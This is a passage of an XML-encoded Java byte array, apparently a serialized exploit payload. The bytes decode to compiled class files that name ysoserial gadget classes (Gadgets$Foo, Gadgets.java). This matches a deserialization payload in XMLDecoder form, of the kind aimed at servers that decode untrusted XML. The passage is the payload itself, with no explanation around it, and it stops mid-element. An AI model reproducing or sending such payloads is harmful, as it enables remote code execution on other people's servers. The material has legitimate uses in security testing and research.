index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void 